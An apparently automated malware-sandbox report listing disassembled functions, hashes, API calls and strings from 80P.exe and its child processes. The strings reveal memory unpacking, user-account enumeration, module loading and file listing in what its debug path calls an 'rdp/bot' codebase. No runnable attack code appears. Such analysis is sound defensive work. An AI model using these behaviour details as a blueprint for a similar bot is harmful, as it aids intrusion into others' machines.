Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
Instruction ID: 2dee252279134b2edf715247d27d062148e1d4e9ff8acefdb92ef1e007a40152
Opcode Fuzzy Hash: d4e8e88555f2eb12c545b98b90c24c3d39095b307ae36abf8871b6113ed62f51
Instruction Fuzzy Hash: 95B18130958B4C8FDB54EF28C89469EB7E1FFA9304F50A71AE449D7251DB70E481CB41

Function 02EACDA6 Relevance: 3.3, APIs: 2, Instructions: 338COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAD0EB
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02EAD0F1

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
Instruction ID: 5ec2ee347bd98024f0c850cc7a3173ed7af3e73f47638f05e6eeddb1cb6de55a
Opcode Fuzzy Hash: c13881684555dfa4367d4d73b1e4ee07c41d0d00dee4c5945f428639c018f28f
Instruction Fuzzy Hash: A0A19231568B4C8BDB14EF2CC8956EA77E2FB99314F50A71AF48AC7164DB30E581CB81

Function 02EA4B4A Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
Instruction ID: f947b3a2bf9a96d8d82b53ba04a140a401ee21195883960a8498ee3c77307ed0
Opcode Fuzzy Hash: b5381d9fe7fa622fd0860884433f0d4a55c1a5d5f6020f8b55c1a12f78539a93
Instruction Fuzzy Hash: F3A1C331658E0C8FCB58EF18C4956EDB7E2FBA9314F00965AE44EDB150DA70F981CB85

Function 02EBD122 Relevance: 1.8, APIs: 1, Instructions: 321COMMON

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 02EBD371

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: _clrfp
String ID:
API String ID: 3618594692-0
Opcode ID: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
Instruction ID: 0c789c15d6a1d91060884ecd4418371af2a1e8cab5f517c15197d5fe240cb853
Opcode Fuzzy Hash: bb3d50ccaa70714ca57f8e18558dc9f0eacc16d483a426df21245d113d691742
Instruction Fuzzy Hash: 84B17930510A4D8FDB9ADF1CC88AB9677E1FF49308F199599E859CB262C335E852CB01

Function 02EA7F2E Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
Instruction ID: 2bf45b41a03c49cb3038cc8d27423799e2ec81e775c89e2f3ea494213dc8ad15
Opcode Fuzzy Hash: c9504ec3498c334db6f4483eaf0aa592e2d3e0a6c7eae909d948189314d3c2b0
Instruction Fuzzy Hash: 60E1A331958B8C8BC745DF28C8A56FAB3E1FFA9304F40971EE486D7150EB74A644CB81

Function 02EB701E Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
Instruction ID: fa48a5f82509675faa08f19c5d0408ccd347d06fe8fe6592d4b708a126f33637
Opcode Fuzzy Hash: 9c6c09f31ddc09bea78bddde318276c838f0745ed6150f3c305ccb77a5701def
Instruction Fuzzy Hash: 8461267195CB5C4FDB29EF6898491BBBBE1EFC4714F00965FE48AC3155DA30A8428AC2

Function 02EB53EA Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
Instruction ID: 7e95944e481566eb0112e0aa38bc148288ddd21dbb1f91d1460e9e3c9f54d4a1
Opcode Fuzzy Hash: a8e9395568328c1374589bad5e4f24ab0974f60651a83110b5ffd51f4435af96
Instruction Fuzzy Hash: 2E51F332718E0D8F8B1DEF6CD4986B673D2FBAC315315822EE44ED7265DA70D8868781

Function 02EA60CE Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction ID: a5a33c13a1891abba0d642bed16e602467418df2ee13b56ed2248f121a2a3939
Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
Instruction Fuzzy Hash: 882186317116054BE70CCE2EC89A575B3D7F7D9209B58D67DD15BCB357C93668038A08

Function 02EA5B3E Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction ID: 42de050ba65b1c4712bc7c8f0d2629f7c2ab9af5b23af592a94acf5d99801daf
Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
Instruction Fuzzy Hash: 0D11E1727118008FDB5CCF3DCDAA66933D6EB89305B48D2BCE51ACB26ADA359803C744

Function 02EB0D62 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 460COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02EB0DBF

Part of subcall function 02EB3122: __GetUnwindTryBlock.LIBCMT ref: 02EB3165
Part of subcall function 02EB3122: __SetUnwindTryBlock.LIBVCRUNTIME ref: 02EB318A

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02EB0E97
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02EB10E5
std::bad_alloc::bad_alloc.LIBCMT ref: 02EB11F2

Strings

csm, xrefs: 02EB0EBA
csm, xrefs: 02EB0E40
csm, xrefs: 02EB0DD9

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
Instruction ID: 06b8b4f886a65053df598078333b3390d16a1808ce331a69c1a31b93d4a99961
Opcode Fuzzy Hash: 108918def01c2ac3d9b7d3d29076d54d19053c4a9c7ba14f76529dd2783086c1
Instruction Fuzzy Hash: D2E1CF30958B488FDB16EF68D4957EA77E1FF99314F10A21EE489DB211DB34E481CB82

Function 02EB1232 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 462COMMON

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02EB13D0
std::bad_alloc::bad_alloc.LIBCMT ref: 02EB16F9

Strings

csm, xrefs: 02EB1379
csm, xrefs: 02EB13F7
csm, xrefs: 02EB1317

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
Instruction ID: ba88b5a776c05a3b7667371a186c55c2b26524a6c8d804c77c380cf8091217a0
Opcode Fuzzy Hash: 44741fef4920e8016cbaa655631b12234c63bd922a043d493a0beaa3d2e65c1f
Instruction Fuzzy Hash: 11E1F530858B488FCB16EF68C4956EA77E1FF59324F10925DE489CB652DB30E486CF82

Function 02EB0632 Relevance: 7.9, APIs: 5, Instructions: 439COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 02EB0755
__AdjustPointer.LIBCMT ref: 02EB07A0

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
Instruction ID: e86d6d4104072a4dccb7f1f5c1f19c4953b666a069650362b64c7f297d7bd60e
Opcode Fuzzy Hash: 85d2843c014daff7437528d10741e8f5ff4ca83c870dc17c53e8f2f83a3b4496
Instruction Fuzzy Hash: 1DC1E430198F5A8F9B2AAF28C0542F7B2D1FF99318B54EA6DD48AC7555DB30F4818BC1

Function 02EAA412 Relevance: 7.8, Strings: 6, Instructions: 289COMMON

Download Yara Rule

Strings

P!`, xrefs: 02EAA71A
`, xrefs: 02EAA4B3
2, xrefs: 02EAA667
H, xrefs: 02EAA6B0
, xrefs: 02EAA672
(, xrefs: 02EAA6C6

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID:
String ID: $($2$H$P!`$`
API String ID: 0-2682688576
Opcode ID: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
Instruction ID: 1a21c480a5ba088638866529ed9ebb5ea3c158a3af7f28b8d4a22cff5fc2811e
Opcode Fuzzy Hash: 6f338864bc440f2af10c69bb62dcc2234c63ea6672277518ce2d0b7b3d90242a
Instruction Fuzzy Hash: 9AC1F4B09187988FD7A4DF18C08879ABBE1FB99304F508A6ED8CDCB215DB705589CF46

Function 02EB19A6 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 294COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02EB1A61

Strings

RCC, xrefs: 02EB1A32
MOC, xrefs: 02EB1A2A

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
Instruction ID: 06ddcde68246b2b686df05b4c85103d1d43cdbc6f4268f8c785ba351c223935b
Opcode Fuzzy Hash: 444dbfe9f3f19db82e809d8395c94021d05aa1c46c0babb41f9330434da2b637
Instruction Fuzzy Hash: 9FA1B230958B488FCB19EF6CC495AEABBE1FF99318F14965EE449CB121DB30E541CB81

Function 02EB006A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 02EB0095
_IsNonwritableInCurrentImage.LIBCMT ref: 02EB012C

Strings

csm, xrefs: 02EB0113

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
Instruction ID: 90dcaf8cd710ce2a6ffea2b9da632dc8663dedef70a43d7221d9a19dd1ea1135
Opcode Fuzzy Hash: 30ef7e2d36ee2c66795a7b7596056c8c55a2b8efc71cae2e964df3408ffd0b69
Instruction Fuzzy Hash: 2561B230648A098BCB2DEE5CD885BB773D1FF54354F10A16DE88AC3256EB30F8958A95

Function 02EB1736 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02EB17E1

Strings

RCC, xrefs: 02EB17B1
MOC, xrefs: 02EB17A9

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
Instruction ID: 7c2add6214f68c1dd729618ebc60c0f1f7a50c95b6fde5177f71f01ee14f0187
Opcode Fuzzy Hash: 6ef9112c19f78de0e2e0f52c9465fb91f3cc3b7f319b326a9b0bcdb3e32a35b8
Instruction Fuzzy Hash: D871B030518B888FD729EF58D456BEAB7E0FF99318F009A5EE48DC7111DB74A581CB82

Function 02EB27F6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 02EB28A0
_CreateFrameInfo.LIBVCRUNTIME ref: 02EB28C9

Strings

csm, xrefs: 02EB29C9

Memory Dump Source

Source File: 00000000.00000002.1682888926.0000000002EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2ea0000_80P.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction ID: 4f73eadc36bb0091815ebdd57ddd80ea270b98f7100d78331b9d5d89b304bcd7
Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
Instruction Fuzzy Hash: F65150B0558B088FC761EF28D4896AB77E1FF99351F10555EE58DC7221DB30E442CB86

Analysis Process: 80P.exePID: 6984, Parent PID: 552COMMON

Execution Graph

Execution Coverage:	59.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	11
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 034101B0 Relevance: 9.3, APIs: 6, Instructions: 317
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 03410215
VirtualProtect.KERNELBASE ref: 03410301
VirtualFree.KERNELBASE ref: 03410332
VirtualFree.KERNELBASE ref: 03410358
VirtualAlloc.KERNELBASE ref: 0341037B
VirtualProtect.KERNELBASE ref: 0341051B

Memory Dump Source

Source File: 00000001.00000002.2935251310.0000000003410000.00000040.00001000.00020000.00000000.sdmp, Offset: 03410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3410000_80P.jbxd

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction ID: ced86964122fab445bd30258253559260316e8cf132382ed2eb8d99a4e47f0b1
Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
Instruction Fuzzy Hash: 16C1B974218A488FD784EF5CC498B5AB7E1FB98305F55486EF48AC7361DBB4E881CB06

Function 03410620 Relevance: 1.3, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 0341063A

Memory Dump Source

Source File: 00000001.00000002.2935251310.0000000003410000.00000040.00001000.00020000.00000000.sdmp, Offset: 03410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3410000_80P.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

Analysis Process: jvnu3e85o6ls9huft0apy3731vg.exePID: 5840, Parent PID: 6984COMMON

Executed Functions

Function 00007FF65CE512FD Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1956789957.00007FF65CE51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF65CE50000, based on PE: true

Associated: 00000009.00000002.1956663300.00007FF65CE50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000009.00000002.1956917307.00007FF65CE60000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000009.00000002.1956917307.00007FF65D45C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000009.00000002.1956917307.00007FF65D45E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000009.00000002.1957645614.00007FF65D875000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000009.00000002.1957659866.00007FF65D87D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000009.00000002.1957659866.00007FF65D87F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000009.00000002.1957685035.00007FF65D880000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000009.00000002.1957697702.00007FF65D883000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff65ce50000_jvnu3e85o6ls9huft0apy3731vg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
Instruction ID: 325d36d79b1c2d307d3d1dcae3cea65ef4b447b65c424a3f04e24806f93887c3
Opcode Fuzzy Hash: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
Instruction Fuzzy Hash: 51B01232B0824184E3007F11DC4125C36207B04700F550070C40C77392DE7D90404710

Analysis Process: main.exePID: 4124, Parent PID: 620COMMON

Execution Graph

Execution Coverage:	6.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	7.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	35

Executed Functions

Function 00007FFE0E1638C3 Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 332
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

LocalAlloc.KERNEL32 ref: 00007FFE0E1638F8
wcsncpy.MSVCRT ref: 00007FFE0E163926
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163983
GetLastError.KERNEL32 ref: 00007FFE0E163995
GetLastError.KERNEL32 ref: 00007FFE0E1639DE
LocalAlloc.KERNEL32 ref: 00007FFE0E163A0D
LookupAccountNameW.ADVAPI32 ref: 00007FFE0E163A49
LocalFree.KERNEL32 ref: 00007FFE0E163A56
GetLastError.KERNEL32 ref: 00007FFE0E163A61

Part of subcall function 00007FFE0E161292: EnterCriticalSection.KERNEL32 ref: 00007FFE0E161363
Part of subcall function 00007FFE0E161292: LeaveCriticalSection.KERNEL32 ref: 00007FFE0E16138B
Part of subcall function 00007FFE0E161292: CopyFileA.KERNEL32 ref: 00007FFE0E1613E8

GetProcessHeap.KERNEL32 ref: 00007FFE0E163D48
HeapAlloc.KERNEL32 ref: 00007FFE0E163D59

Strings

D, xrefs: 00007FFE0E163915
[E] (%s) -> ConvertSidToStringSid failed(gle=%lu), xrefs: 00007FFE0E163BE5
mem_alloc, xrefs: 00007FFE0E1638C6, 00007FFE0E163D6F
users_sync, xrefs: 00007FFE0E1639A0, 00007FFE0E1639EC, 00007FFE0E163A6C, 00007FFE0E163BBD
[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x), xrefs: 00007FFE0E163BC4
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE0E1638CD, 00007FFE0E163D76
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE0E1639A7, 00007FFE0E1639F3, 00007FFE0E163A73
sid_to_str, xrefs: 00007FFE0E163BDE

Memory Dump Source

Source File: 00000014.00000002.2559487244.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000014.00000002.2559462531.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559534542.00007FFE0E174000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559554043.00007FFE0E17D000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559569577.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000014.00000002.2559586296.00007FFE0E181000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffe0e160000_main.jbxd

Similarity

API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
API String ID: 3624467404-104752423
Opcode ID: 77f039575536de71df0d3d15065c23e897c673814d0f2d56dbe4c0034cf1c5e9
Instruction ID: b4581d078a970d0cd9a5627759c46edfbd6e021621805fcb8e1c62a1cddd1150
Opcode Fuzzy Hash: 77f039575536de71df0d3d15065c23e897c673814d0f2d56dbe4c0034cf1c5e9
Instruction Fuzzy Hash: 9DF14862A0CA0386FB608B24E44437963A2EBC4B54F654037D9EE477BADF3DE849D741

Function 00007FF6BFD68563 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 179stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6BFD61360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF6BFD684AF), ref: 00007FF6BFD6137E

strlen.MSVCRT ref: 00007FF6BFD685D8
strlen.MSVCRT ref: 00007FF6BFD685FA
_mbscpy.MSVCRT ref: 00007FF6BFD68616
strlen.MSVCRT ref: 00007FF6BFD6861E
strlen.MSVCRT ref: 00007FF6BFD68635
FreeLibrary.KERNEL32 ref: 00007FF6BFD68671
GetProcessHeap.KERNEL32 ref: 00007FF6BFD6872D
HeapAlloc.KERNEL32 ref: 00007FF6BFD68741
_mbscpy.MSVCRT ref: 00007FF6BFD68756

Strings

[I] (%s) -> Done(name=%s), xrefs: 00007FF6BFD6883A
units_init, xrefs: 00007FF6BFD6871A, 00007FF6BFD687F2, 00007FF6BFD68833
unit_init, xrefs: 00007FF6BFD686DF
mem_alloc, xrefs: 00007FF6BFD68788
[E] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF6BFD687F9
[I] (%s) -> Loaded(f_path=%s), xrefs: 00007FF6BFD68721
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF6BFD6878F
unit_cleanup, xrefs: 00007FF6BFD686F6

Memory Dump Source

Source File: 00000014.00000002.2558465640.00007FF6BFD61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6BFD60000, based on PE: true

Associated: 00000014.00000002.2558446328.00007FF6BFD60000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558491799.00007FF6BFD70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD78000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558509462.00007FF6BFD7A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000014.00000002.2558544105.00007FF6BFD7E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff6bfd60000_main.jbxd

Similarity

API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
API String ID: 548194777-214984806
Opcode ID: 47819f1301a992ae7be7bbe4044968ff8155d3b3116fb4ff4251830b2711549d
Instruction ID: ea40a60f4ba252cc1da0bdb733ae47b6ce6584feeff21e6d69645754e0b08120
Opcode Fuzzy Hash: 47819f1301a992ae7be7bbe4044968ff8155d3b3116fb4ff4251830b2711549d
Instruction Fuzzy Hash: A3815D61B08643A1FB219B99E4517B973A1EF44B84F444635EB4D8B7B5EF3CE90AC380

Function 00007FFE0EBD4013 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

FindNextFileA.KERNEL32 ref: 00007FFE0EBD4059
strcpy.MSVCRT ref: 00007FFE0EBD4074
FindFirstFileA.KERNEL32 ref: 00007FFE0EBD4147
GetLastError.KERNEL32 ref: 00007FFE0EBD4163
GetLastError.KERNEL32 ref: 00007FFE0EBD4192
FindClose.KERNEL32 ref: 00007FFE0EBD41B0

Part of subcall function 00007FFE0EBD1292: fwrite.MSVCRT ref: 00007FFE0EBD133E
Part of subcall function 00007FFE0EBD1292: fflush.MSVCRT ref: 00007FFE0EBD134A

Strings

[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu), xrefs: 00007FFE0EBD4184
[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu), xrefs: 00007FFE0EBD41C8
(name != NULL), xrefs: 00007FFE0EBD40E1
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE0EBD40A2, 00007FFE0EBD40DA, 00007FFE0EBD4112
(path != NULL), xrefs: 00007FFE0EBD40A9
fs_dir_list, xrefs: 00007FFE0EBD40B0, 00007FFE0EBD40E8, 00007FFE0EBD4120, 00007FFE0EBD417D, 00007FFE0EBD41C1
(resume_handle != NULL), xrefs: 00007FFE0EBD4119
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EBD40B7, 00007FFE0EBD40EF, 00007FFE0EBD4127

Memory Dump Source

Source File: 00000014.00000002.2559714739.00007FFE0EBD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE0EBD0000, based on PE: true

Associated: 00000014.00000002.2559699117.00007FFE0EBD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559733043.00007FFE0EBE3000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559748990.00007FFE0EBEC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559764197.00007FFE0EBEF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000014.00000002.2559777530.00007FFE0EBF0000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

